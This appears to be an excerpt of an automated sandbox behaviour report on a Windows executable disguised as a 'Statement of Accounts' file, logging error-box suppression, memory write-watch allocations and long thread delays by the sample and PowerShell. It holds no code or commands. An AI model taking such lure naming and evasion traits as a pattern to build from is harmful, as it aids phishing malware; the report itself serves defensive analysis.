Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Memory allocated: 1900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Memory allocated: 1C590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Memory allocated: 1BAD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599759	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599639	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599373	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599185	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599077	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598587	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598336	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598230	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596797	Jump to behavior
